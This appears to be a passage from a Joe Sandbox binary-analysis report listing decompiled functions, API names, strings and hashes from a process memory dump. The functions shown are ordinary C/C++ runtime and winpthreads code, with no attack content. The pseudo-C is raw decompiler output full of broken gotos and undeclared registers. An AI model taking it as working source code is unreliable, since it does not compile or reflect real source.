                        Function 00007FF6935EC350 Relevance: 10.7, APIs: 2, Strings: 5, Instructions: 182COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00007FF67FF6935EC350(void* __eflags, long long* __rcx, intOrPtr* __rdx) {
				signed int _t6;
				long long _t15;
				long long _t17;
				signed char* _t18;

				_t17 =  *((intOrPtr*)(__rdx + 8));
				_t15 = __rcx + 0x10;
				 *__rcx = _t15;
				_t18 =  *((intOrPtr*)(__rdx));
				if (__eflags == 0) goto 0x935ec376;
				if (_t18 == 0) goto 0x935ec3e2;
				if (_t17 - 0xf > 0) goto 0x935ec3b0;
				if (_t17 != 1) goto 0x935ec3a0;
				_t6 =  *_t18 & 0x000000ff;
				 *(__rcx + 0x10) = _t6;
				 *((long long*)(__rcx + 8)) = _t17;
				 *((char*)(_t15 + _t17)) = 0;
				return _t6;
			}







                        0x7ff6935ec358
                        0x7ff6935ec35f
                        0x7ff6935ec363
                        0x7ff6935ec366
                        0x7ff6935ec36f
                        0x7ff6935ec374
                        0x7ff6935ec37a
                        0x7ff6935ec380
                        0x7ff6935ec382
                        0x7ff6935ec387
                        0x7ff6935ec38a
                        0x7ff6935ec38e
                        0x7ff6935ec39a

                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID:
                        • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_M_construct null not valid$basic_string::_M_create$basic_string::basic_string$string::string
                        • API String ID: 0-4165567116
                        • Opcode ID: ce8e2d38325566c7c0c8c1d2c5911396e3a9db0cd6777e9dbd56732d05f63734
                        • Instruction ID: 1d6b2e9d8bf5e60890528f3d687d6f44612b3703dc7cfadbe2a8dc577a92049d
                        • Opcode Fuzzy Hash: ce8e2d38325566c7c0c8c1d2c5911396e3a9db0cd6777e9dbd56732d05f63734
                        • Instruction Fuzzy Hash: C851B373E05B4291EB30AF25D4421B873A8FB1DF94B9446B2CA6DA7391EE3CD956D300
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935EC900 Relevance: 10.7, APIs: 2, Strings: 5, Instructions: 182COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00007FF67FF6935EC900(void* __eflags, long long* __rcx, intOrPtr* __rdx) {
				signed int _t6;
				long long _t15;
				long long _t17;
				signed char* _t18;

				_t17 =  *((intOrPtr*)(__rdx + 8));
				_t15 = __rcx + 0x10;
				 *__rcx = _t15;
				_t18 =  *((intOrPtr*)(__rdx));
				if (__eflags == 0) goto 0x935ec926;
				if (_t18 == 0) goto 0x935ec992;
				if (_t17 - 0xf > 0) goto 0x935ec960;
				if (_t17 != 1) goto 0x935ec950;
				_t6 =  *_t18 & 0x000000ff;
				 *(__rcx + 0x10) = _t6;
				 *((long long*)(__rcx + 8)) = _t17;
				 *((char*)(_t15 + _t17)) = 0;
				return _t6;
			}







                        0x7ff6935ec908
                        0x7ff6935ec90f
                        0x7ff6935ec913
                        0x7ff6935ec916
                        0x7ff6935ec91f
                        0x7ff6935ec924
                        0x7ff6935ec92a
                        0x7ff6935ec930
                        0x7ff6935ec932
                        0x7ff6935ec937
                        0x7ff6935ec93a
                        0x7ff6935ec93e
                        0x7ff6935ec94a

                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID:
                        • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_M_construct null not valid$basic_string::_M_create$basic_string::basic_string$string::string
                        • API String ID: 0-4165567116
                        • Opcode ID: 83a3d6c2ada1231e204cb2f150e8377795d645e0b2d449cfe8e20997b39be8e3
                        • Instruction ID: 4938072fdbe8194c5cbdeacc2267e6c75466303aa8da599bba2abe0eb4a634ce
                        • Opcode Fuzzy Hash: 83a3d6c2ada1231e204cb2f150e8377795d645e0b2d449cfe8e20997b39be8e3
                        • Instruction Fuzzy Hash: 8051C472E05B8290EB30AF25D4421B87368FB1CF94B4452B2CA6DA7391EF2CE556D300
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935D4920 Relevance: 10.6, APIs: 7, Instructions: 104COMMON
                        Download Yara Rule
                        C-Code - Quality: 58%
                        			E00007FF67FF6935D4920(void* __ecx, void* __rax, long long __rcx, void* __rdx, void* __r12, void* __r13) {
				int _t39;
				int _t42;
				void* _t81;
				intOrPtr _t82;
				intOrPtr _t84;
				intOrPtr _t86;
				intOrPtr _t88;
				intOrPtr _t91;
				intOrPtr _t93;
				long _t95;
				intOrPtr* _t97;
				intOrPtr* _t98;
				long long _t120;

				_t81 = __rax;
				_t120 = __rcx;
				E00007FF67FF6935D2100(__ecx, __rdx);
				 *((long long*)(_t81 + 8)) = _t120;
				if ( *((intOrPtr*)(_t81 + 0x1d8)) == 0) goto 0x935d4949;
				E00007FF67FF6935D2640(_t81,  *((intOrPtr*)(_t81 + 0x1d8)));
				if (( *(_t81 + 0x40) & 0x00000030) == 0) goto 0x935d49e8;
				_t97 =  *0x935f8900; // 0x7ff6936023e0
				_t82 =  *_t97;
				if (_t82 == 0) goto 0x935d49c9;
				if ( *((long long*)(_t82 + 0x30)) != 0) goto 0x935d49e2;
				 *((long long*)( *_t97 + 0x30)) = 0x935f3fb8;
				TlsGetValue(_t95);
				if (0x935f3fb8 == 0) goto 0x935d49c0;
				if ( *0x7FF6935F3FE0 == 0) goto 0x935d49fa;
				 *0x7FF6935F4074 = 1;
				r13d =  *0x7FF6935F3FC0;
				if ( *((intOrPtr*)(0x7ff6935f3fe8)) == 0) goto 0x935d49ab;
				CloseHandle(__r12);
				 *((long long*)(0x7ff6935f3fe8)) = 0;
				if (( *0x7FF6935F3FFC & 0x00000004) != 0) goto 0x935d4a4d;
				__imp___endthreadex();
				E00007FF67FF6935D6420();
				if ( *((long long*)(0x7ff6935f3fe8)) == 0) goto 0x935d4969;
				_t84 =  *_t97;
				if (_t84 != 0) goto 0x935d49e2;
				E00007FF67FF6935D6420();
				goto 0x935d4977;
				_t18 = _t97 + 0xd0; // 0xd0
				__imp__longjmp();
				 *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x30)))) = 0xdeadbeef;
				if (_t18 == 0) goto 0x935d4a0b;
				_t39 = CloseHandle(__r13);
				 *((long long*)(0x7ff6935f3fe8)) = 0;
				r13d =  *((intOrPtr*)(0x7ff6935f3fc0));
				E00007FF67FF6935D20E0(_t39, 0x935f3fb8);
				_t86 =  *_t97;
				if (_t86 == 0) goto 0x935d4a96;
				if ( *((long long*)(_t86 + 0x30)) != 0) goto 0x935d4a80;
				 *((long long*)(_t86 + 0x30)) = 0x935f3fb8;
				TlsSetValue(??, ??);
				goto 0x935d49c0;
				 *0x935f3fb8 = 0xdeadbeef;
				_t42 = CloseHandle(??);
				 *((long long*)(0x7ff6935f3fe0)) = 0;
				E00007FF67FF6935D20E0(_t42, 0x935f3fb8);
				_t88 =  *_t97;
				if (_t88 == 0) goto 0x935d4ab4;
				if ( *((long long*)(_t88 + 0x30)) == 0) goto 0x935d4a86;
				goto 0x935d4a3e;
				 *((long long*)( *_t97 + 0x30)) = 0x935f3fb8;
				goto 0x935d4a3e;
				E00007FF67FF6935D6420();
				_t91 =  *_t97;
				if ( *((long long*)(0x7ff6935f3fe8)) == 0) goto 0x935d4a30;
				if (_t91 != 0) goto 0x935d4a80;
				E00007FF67FF6935D6420();
				goto 0x935d4a80;
				E00007FF67FF6935D6420();
				if ( *((long long*)(_t91 + 0x30)) == 0) goto 0x935d4a86;
				goto 0x935d4aa8;
				asm("o16 nop [cs:eax+eax]");
				_push(_t97);
				_t98 =  *0x935f8900; // 0x7ff6936023e0
				_t93 =  *_t98;
				if (_t93 == 0) goto 0x935d4b20;
				if ( *((long long*)(_t93 + 0x18)) != 0) goto 0x935d4b40;
				 *((long long*)(_t93 + 0x18)) = 0x936023b0;
				if ( *0x936023b0 == 0) goto 0x935d4b10;
				E00007FF67FF6935D2100( *0x936023b0, 0x936023b0);
				if (0x936023b0 == 0) goto 0x935d4b10;
				if ( *0x7FF6936023D0 <= 0) goto 0x935d4b50;
				return 0;
			}
















                        0x7ff6935d4920
                        0x7ff6935d4929
                        0x7ff6935d492c
                        0x7ff6935d4938
                        0x7ff6935d4942
                        0x7ff6935d4944
                        0x7ff6935d494d
                        0x7ff6935d4953
                        0x7ff6935d495a
                        0x7ff6935d4960
                        0x7ff6935d4967
                        0x7ff6935d4973
                        0x7ff6935d4979
                        0x7ff6935d4985
                        0x7ff6935d4990
                        0x7ff6935d4992
                        0x7ff6935d499c
                        0x7ff6935d49a3
                        0x7ff6935d49a5
                        0x7ff6935d49ab
                        0x7ff6935d49ba
                        0x7ff6935d49c3
                        0x7ff6935d49c9
                        0x7ff6935d49d3
                        0x7ff6935d49d5
                        0x7ff6935d49db
                        0x7ff6935d49dd
                        0x7ff6935d49e6
                        0x7ff6935d49e8
                        0x7ff6935d49f4
                        0x7ff6935d49fa
                        0x7ff6935d4a03
                        0x7ff6935d4a05
                        0x7ff6935d4a0b
                        0x7ff6935d4a17
                        0x7ff6935d4a1c
                        0x7ff6935d4a21
                        0x7ff6935d4a27
                        0x7ff6935d4a2e
                        0x7ff6935d4a37
                        0x7ff6935d4a42
                        0x7ff6935d4a48
                        0x7ff6935d4a52
                        0x7ff6935d4a5a
                        0x7ff6935d4a63
                        0x7ff6935d4a6c
                        0x7ff6935d4a71
                        0x7ff6935d4a77
                        0x7ff6935d4a7e
                        0x7ff6935d4a84
                        0x7ff6935d4a90
                        0x7ff6935d4a94
                        0x7ff6935d4a96
                        0x7ff6935d4a9e
                        0x7ff6935d4aa6
                        0x7ff6935d4aab
                        0x7ff6935d4aad
                        0x7ff6935d4ab2
                        0x7ff6935d4ab4
                        0x7ff6935d4abe
                        0x7ff6935d4ac3
                        0x7ff6935d4ac5
                        0x7ff6935d4ad0
                        0x7ff6935d4ad5
                        0x7ff6935d4adc
                        0x7ff6935d4ae2
                        0x7ff6935d4ae9
                        0x7ff6935d4af2
                        0x7ff6935d4afd
                        0x7ff6935d4aff
                        0x7ff6935d4b07
                        0x7ff6935d4b0e
                        0x7ff6935d4b17

                        APIs
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: CloseHandleValue$_endthreadexlongjmp
                        • String ID:
                        • API String ID: 3990644698-0
                        • Opcode ID: 944f30e4a3dfae3aef5af77ddd4317e1601b2d20f29d1d17dc9970a67e0fc127
                        • Instruction ID: 72a8be3d3cbda45b3f004954aca074c6b48d0b7c7ee65e50a2f0fc7c22b00f57
                        • Opcode Fuzzy Hash: 944f30e4a3dfae3aef5af77ddd4317e1601b2d20f29d1d17dc9970a67e0fc127
                        • Instruction Fuzzy Hash: 92511B71A19B0281FBB49B52D45737A36A9FF48B48F1541BACE2DA7391DF3CA844C305
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935D6C70 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 85COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00007FF67FF6935D6C70(void* __edx, intOrPtr* __rcx) {
				intOrPtr _t19;
				intOrPtr _t23;
				void* _t28;
				intOrPtr* _t29;

				_t29 =  *0x935f8900; // 0x7ff6936023e0
				_t19 =  *_t29;
				r12d = __edx;
				if (_t19 == 0) goto 0x935d6d08;
				if ( *((long long*)(_t19 + 0xa0)) != 0) goto 0x935d6d28;
				 *((long long*)(_t19 + 0xa0)) = 0x935f3fc8;
				E00007FF67FF6935D7BF0(0x935f3fc8, _t28);
				if ( *((intOrPtr*)( *__rcx)) != 0xbab1f0ed) goto 0x935d6d69;
				if ( *((intOrPtr*)( *__rcx + 4)) <= 0) goto 0x935d6d69;
				 *((intOrPtr*)( *__rcx + 4)) =  *((intOrPtr*)( *__rcx + 4)) - 1;
				_t23 =  *_t29;
				if (_t23 == 0) goto 0x935d6d38;
				if ( *((long long*)(_t23 + 0xa0)) != 0) goto 0x935d6d60;
				 *((long long*)(_t23 + 0xa0)) = 0x935f3fc8;
				E00007FF67FF6935D7C30(0x935f3fc8);
				return r12d;
			}







                        0x7ff6935d6c78
                        0x7ff6935d6c7f
                        0x7ff6935d6c85
                        0x7ff6935d6c8b
                        0x7ff6935d6c95
                        0x7ff6935d6ca2
                        0x7ff6935d6ca9
                        0x7ff6935d6cb7
                        0x7ff6935d6cc5
                        0x7ff6935d6cce
                        0x7ff6935d6cd2
                        0x7ff6935d6cd8
                        0x7ff6935d6ce2
                        0x7ff6935d6ceb
                        0x7ff6935d6cf2
                        0x7ff6935d6d02

                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID:
                        • String ID: (((rwlock_t *)*rwl)->valid == LIFE_RWLOCK) && (((rwlock_t *)*rwl)->busy > 0)$.$Assertion failed: (%s), file %s, line %d$C:/crossdev/src/mingw-w64-v8-git/mingw-w64-libraries/winpthreads/src/rwlock.c
                        • API String ID: 0-3957588491
                        • Opcode ID: 58f877f3f909de77631ad4f4d2eaaa299914e596ef7d9396fdd29e6e52ca8098
                        • Instruction ID: 3e087b98602dcb3633f3a8ad65958e2b20c7cc631afc5e228dd78f7816dbaafe
                        • Opcode Fuzzy Hash: 58f877f3f909de77631ad4f4d2eaaa299914e596ef7d9396fdd29e6e52ca8098
                        • Instruction Fuzzy Hash: E1316F22A0974A85EB30AB55E0523B927A8FF4DB48F8581B6DA5CA7391DF3CE446C301
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935D92F0 Relevance: 10.5, APIs: 7, Instructions: 46COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00007FF67FF6935D92F0(void* __edx, void* __rcx, void* __r8) {

				r12d = __edx;
				if (__r8 == 0) goto 0x935d9361;
				if (__rcx != 0) goto 0x935d9320;
				if (r12d != 0) goto 0x935d934d;
				return r12d;
			}



                        0x7ff6935d92fa
                        0x7ff6935d9300
                        0x7ff6935d9305
                        0x7ff6935d930a
                        0x7ff6935d9316

                        APIs
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: Process$CloseCurrentHandleOpen_errno
                        • String ID:
                        • API String ID: 2250453136-0
                        • Opcode ID: 04e03e2c1dcd1a72f894048ec280e35dd20f76688bdde7239ccd22cc7b8ef187
                        • Instruction ID: a405e7c3ee50fdc38f8140278d1653b5c0d9c915cc0cde0cf5f912876c8ee2f9
                        • Opcode Fuzzy Hash: 04e03e2c1dcd1a72f894048ec280e35dd20f76688bdde7239ccd22cc7b8ef187
                        • Instruction Fuzzy Hash: 3301C03190CA03D6FA351F669847138229AFF08B25F6412B9CA3EB66D4DE3C6484D320
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935CE520 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 45COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: CriticalSection$EnterLeave_assertcalloc
                        • String ID: !dso || dso == &__dso_handle$C:/crossdev/src/mingw-w64-v8-git/mingw-w64-crt/crt/tls_atexit.c
                        • API String ID: 4191840866-4180103562
                        • Opcode ID: 9e74119ed8410213880c531de6a50795c84e3aedb6eec8cab171008625c93a47
                        • Instruction ID: 0e3bf137bc96c63b486c8b9c24312760d75ccffe9c9cb30a7bee8d543f62ded4
                        • Opcode Fuzzy Hash: 9e74119ed8410213880c531de6a50795c84e3aedb6eec8cab171008625c93a47
                        • Instruction Fuzzy Hash: 3F015B31A0860751FB318B56F8532B82698EF4C795FC540B0CA2CE73A5EE6CE985D300
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935D7D40 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 45threadCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: CurrentThreadfprintf
                        • String ID: C%p %d %s$C%p %d V=%0X w=%ld %s
                        • API String ID: 1384477639-884133013
                        • Opcode ID: d404a1d808709ea5ee6d1ee9474c52aa295e18b92de93962cff9c7e3f0327dee
                        • Instruction ID: aaf07727c807eaf7ccf6dfd88a6e985a74220fa682d2ccc3edfce5f01ba61020
                        • Opcode Fuzzy Hash: d404a1d808709ea5ee6d1ee9474c52aa295e18b92de93962cff9c7e3f0327dee
                        • Instruction Fuzzy Hash: 3D018476A0970686FA319F26F8124683768FB48BD8B948075DD5CA3354DF3CE445D700
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935CE507 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 42COMMON
                        Download Yara Rule
                        C-Code - Quality: 25%
                        			E00007FF67FF6935CE507(void* __eax, intOrPtr* __rax, void* __rcx, long long __rdx, void* __r8) {
				intOrPtr _t5;
				long long _t17;
				int _t18;
				struct _CRITICAL_SECTION* _t27;
				struct _CRITICAL_SECTION* _t30;

				asm("loopne 0x2b");
				 *__rax =  *__rax + __eax + 0xe8fffffe;
				goto 0x935ce3d6;
				asm("o16 nop [cs:eax+eax]");
				_t5 =  *0x93602190; // 0x1
				if (_t5 == 0) goto 0x935ce5c0;
				if (__r8 == 0) goto 0x935ce565;
				if (__r8 == 0x93602180) goto 0x935ce565;
				r8d = 0x2b;
				0x935e0b30();
				calloc(_t18);
				if (0x93602180 == 0) goto 0x935ce5c0;
				 *0x93602180 = __rcx;
				 *0x7FF693602188 = __rdx;
				EnterCriticalSection(_t30);
				_t17 =  *0x93602188; // 0x0
				 *0x93602188 = 0x93602180;
				 *0x7FF693602190 = _t17;
				LeaveCriticalSection(_t27);
				return 0;
			}








                        0x7ff6935ce50c
                        0x7ff6935ce50e
                        0x7ff6935ce510
                        0x7ff6935ce515
                        0x7ff6935ce527
                        0x7ff6935ce535
                        0x7ff6935ce53e
                        0x7ff6935ce54a
                        0x7ff6935ce54c
                        0x7ff6935ce560
                        0x7ff6935ce56f
                        0x7ff6935ce57a
                        0x7ff6935ce57c
                        0x7ff6935ce586
                        0x7ff6935ce58a
                        0x7ff6935ce590
                        0x7ff6935ce59e
                        0x7ff6935ce5a5
                        0x7ff6935ce5a9
                        0x7ff6935ce5b8

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: CriticalSection$EnterLeave_assertcalloc
                        • String ID: !dso || dso == &__dso_handle$C:/crossdev/src/mingw-w64-v8-git/mingw-w64-crt/crt/tls_atexit.c
                        • API String ID: 4191840866-4180103562
                        • Opcode ID: 3580572c2aa0ca8fd24a54655ed253ffd0d82b700cfa713592cc6607b4844b2f
                        • Instruction ID: 11c3d4578ea7521014898c75278f4fa44d962c88ede9add8ae769896595aff08
                        • Opcode Fuzzy Hash: 3580572c2aa0ca8fd24a54655ed253ffd0d82b700cfa713592cc6607b4844b2f
                        • Instruction Fuzzy Hash: 14112732A0870396FA228B51F8422B82698EF48795FC540B0CA1CE73A5EE6CE985D310
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935CC1B0 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 230COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00007FF67FF6935CC1B0(void* __rax, void* __rcx, intOrPtr* __r8) {
				intOrPtr _t13;
				signed char _t14;
				signed long long _t41;

				if (__r8 == 0) goto 0x935cc253;
				r13d = 1;
				goto 0x935cc249;
				if ( *((intOrPtr*)(__r8 + 0x10)) != 0) goto 0x935cc241;
				_t13 =  *((intOrPtr*)( *((intOrPtr*)(__r8 + 8))));
				if (r9d != 0) goto 0x935cc205;
				_t14 = __rax - 0x1c;
				if (_t14 - 0x34 > 0) goto 0x935cc205;
				if ((_t41 << _t14 & 0x0000001f) != 0) goto 0x935cc241;
				 *((intOrPtr*)(__r8 + 0x10)) = 1;
				 *((long long*)(__rcx + 0x120)) =  *((intOrPtr*)(__r8 + 0x18));
				if (_t13 == 0x29) goto 0x935cc260;
				if (_t13 == 0x2a) goto 0x935cc284;
				if (_t13 == 2) goto 0x935cc2a8;
				E00007FF67FF6935CB440();
				if ( *__r8 == 0) goto 0x935cc253;
				if ( *((intOrPtr*)(__rcx + 0x130)) == 0) goto 0x935cc1e0;
				return _t13;
			}






                        0x7ff6935cc1c8
                        0x7ff6935cc1d8
                        0x7ff6935cc1de
                        0x7ff6935cc1e5
                        0x7ff6935cc1eb
                        0x7ff6935cc1f0
                        0x7ff6935cc1f2
                        0x7ff6935cc1f8
                        0x7ff6935cc203
                        0x7ff6935cc209
                        0x7ff6935cc217
                        0x7ff6935cc221
                        0x7ff6935cc226
                        0x7ff6935cc22b
                        0x7ff6935cc235
                        0x7ff6935cc247
                        0x7ff6935cc251
                        0x7ff6935cc25f

                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID:
                        • String ID: :$default arg#${$}$}::
                        • API String ID: 0-1396675520
